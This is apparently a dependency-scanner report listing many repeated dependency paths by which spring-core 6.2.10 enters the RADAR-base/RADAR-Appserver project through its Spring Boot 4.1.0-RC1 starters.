Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
